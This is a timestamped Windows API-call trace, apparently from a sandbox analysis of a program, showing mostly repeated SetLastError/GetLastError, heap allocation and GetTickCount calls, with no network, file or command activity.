0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.690] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x4f) returned 0xea1800 [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.691] SetLastError (dwErrCode=0x0) [0036.691] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] GetLastError () returned 0x0 [0036.692] SetLastError (dwErrCode=0x0) [0036.692] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb8) returned 0xea1858 [0036.692] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x43) returned 0xea1918 [0036.692] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x4c) returned 0xea1968 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5b) returned 0xea19c0 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xea1a28 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x55) returned 0xea1a90 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x38) returned 0xea1af0 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x48) returned 0xea1b30 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x31) returned 0xea1b80 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x3b) returned 0xea1bc0 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x4f) returned 0xea1c08 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x39) returned 0xea1c60 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x3b) returned 0xea1ca8 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xea1cf0 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x32) returned 0xea1d40 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xe5) returned 0xea1d80 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x62) returned 0xea1e70 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x3f) returned 0xea1ee0 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x41) returned 0xea1f28 [0036.693] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x6c) returned 0xea1f78 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x36) returned 0xea1ff0 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x3c) returned 0xea2030 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x3f) returned 0xea2078 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x48) returned 0xea20c0 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x4d) returned 0xea2110 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x42) returned 0xea2168 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8f) returned 0xea21b8 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x3b) returned 0xea2250 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x33) returned 0xea2298 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x3a) returned 0xea22d8 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x4c) returned 0xea2320 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x4b) returned 0xea2378 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x36) returned 0xea23d0 [0036.694] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x45) returned 0xea2410 [0036.695] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x34) returned 0xea2460 [0036.695] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xea24a0 [0036.695] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x36) returned 0xea24e8 [0036.695] HeapValidate (hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1018) returned 1 [0036.695] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1018 | out: hHeap=0xea0000) returned 1 [0036.695] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75e90000 [0036.695] GetProcAddress (hModule=0x75e90000, lpProcName="IsProcessorFeaturePresent") returned 0x75ea5960 [0036.695] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0036.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa4) returned 0xea1018 [0036.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x824) returned 0xea2528 [0036.696] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4078c0) returned 0x0 [0036.697] HeapValidate (hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1018) returned 1 [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.709] SetLastError (dwErrCode=0x0) [0036.709] GetLastError () returned 0x0 [0036.709] SetLastError (dwErrCode=0x0) [0036.709] GetLastError () returned 0x0 [0036.709] SetLastError (dwErrCode=0x0) [0036.709] GetLastError () returned 0x0 [0036.709] SetLastError (dwErrCode=0x0) [0036.709] GetLastError () returned 0x0 [0036.710] SetLastError (dwErrCode=0x0) [0036.710] lstrlenW (lpString="") returned 0 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.710] GetTickCount () returned 0x1149c03 [0036.710] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.711] GetLastError () returned 0x0 [0036.711] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.712] GetLastError () returned 0x0 [0036.712] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.713] GetLastError () returned 0x0 [0036.713] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.714] GetLastError () returned 0x0 [0036.714] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c03 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c12 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c12 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c12 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c12 [0036.715] GetLastError () returned 0x0 [0036.715] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.716] GetTickCount () returned 0x1149c12 [0036.716] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.717] GetTickCount () returned 0x1149c12 [0036.717] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.718] GetTickCount () returned 0x1149c12 [0036.718] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 